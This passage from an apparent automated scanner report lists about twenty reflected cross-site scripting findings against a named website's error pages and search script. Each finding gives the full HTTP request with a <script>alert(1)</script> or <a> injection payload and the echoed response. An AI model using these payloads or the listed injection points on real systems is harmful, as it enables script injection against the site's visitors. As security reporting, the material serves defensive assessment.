Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review880ce<script>alert(1)</script>b3d649fde8e/ was not found on this server.</p>
...[SNIP]...

2.390. http://www.resellerbase.com/adult/themes/kosmos/images/review/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c969e<script>alert(1)</script>1d77e092bbb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review/?c969e<script>alert(1)</script>1d77e092bbb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/?c969e<script>alert(1)</script>1d77e092bbb=1 was not found on this server.</p>
...[SNIP]...

2.391. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3967d<script>alert(1)</script>be15945341e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult3967d<script>alert(1)</script>be15945341e/themes/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult3967d<script>alert(1)</script>be15945341e/themes/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.392. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9c0f0<script>alert(1)</script>e6ae068f294 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes9c0f0<script>alert(1)</script>e6ae068f294/kosmos/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes9c0f0<script>alert(1)</script>e6ae068f294/kosmos/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.393. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f657d<script>alert(1)</script>3de3c6f99e2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmosf657d<script>alert(1)</script>3de3c6f99e2/images/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmosf657d<script>alert(1)</script>3de3c6f99e2/images/review/0.gif was not found on this server.</p>
...[SNIP]...

2.394. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45c19<script>alert(1)</script>de1f5ad490b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images45c19<script>alert(1)</script>de1f5ad490b/review/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images45c19<script>alert(1)</script>de1f5ad490b/review/0.gif was not found on this server.</p>
...[SNIP]...

2.395. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6b2e3<script>alert(1)</script>a25fcbb819e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review6b2e3<script>alert(1)</script>a25fcbb819e/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review6b2e3<script>alert(1)</script>a25fcbb819e/0.gif was not found on this server.</p>
...[SNIP]...

2.396. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f1ab5<script>alert(1)</script>725cebe871e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review/0.giff1ab5<script>alert(1)</script>725cebe871e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:43:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/0.giff1ab5<script>alert(1)</script>725cebe871e was not found on this server.</p>
...[SNIP]...

2.397. http://www.resellerbase.com/adult/themes/kosmos/images/review/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5df4c<script>alert(1)</script>0bade085e80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review/0.gif?5df4c<script>alert(1)</script>0bade085e80=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:42:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/0.gif?5df4c<script>alert(1)</script>0bade085e80=1 was not found on this server.</p>
...[SNIP]...

2.398. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5782<script>alert(1)</script>fb1fa2c80c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adultc5782<script>alert(1)</script>fb1fa2c80c2/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adultc5782<script>alert(1)</script>fb1fa2c80c2/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.399. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b05d5<script>alert(1)</script>b31fa2c7aa2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themesb05d5<script>alert(1)</script>b31fa2c7aa2/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themesb05d5<script>alert(1)</script>b31fa2c7aa2/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.400. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 784b6<script>alert(1)</script>51a1c484827 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos784b6<script>alert(1)</script>51a1c484827/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos784b6<script>alert(1)</script>51a1c484827/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.401. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7b49a<script>alert(1)</script>d2fdc431f86 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images7b49a<script>alert(1)</script>d2fdc431f86/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images7b49a<script>alert(1)</script>d2fdc431f86/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.402. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9b80f<script>alert(1)</script>79dd06dfb4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review9b80f<script>alert(1)</script>79dd06dfb4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review9b80f<script>alert(1)</script>79dd06dfb4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.403. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3c831<script>alert(1)</script>a325bfee0cd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review/search.php3c831<script>alert(1)</script>a325bfee0cd?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/search.php3c831<script>alert(1)</script>a325bfee0cd?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.404. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 78643<a>30227ea2606 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search78643<a>30227ea2606&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search78643<a>30227ea2606&opt=2 was not found on this server.</p>
...[SNIP]...

2.405. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload acff7<a>ad11e83be04 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/review/search.php?keyword=search...acff7<a>ad11e83be04&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/search.php?keyword=search...acff7<a>ad11e83be04&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.406. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ccefd<script>alert(1)</script>f9b734324cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&ccefd<script>alert(1)</script>f9b734324cb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:35:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&ccefd<script>alert(1)</script>f9b734324cb=1 was not found on this server.</p>
...[SNIP]...

2.407. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /adult/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 3d8b3<a>bc16afcba37 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=23d8b3<a>bc16afcba37 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=23d8b3<a>bc16afcba37 was not found on this server.</p>
...[SNIP]...

2.408. http://www.resellerbase.com/adult/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
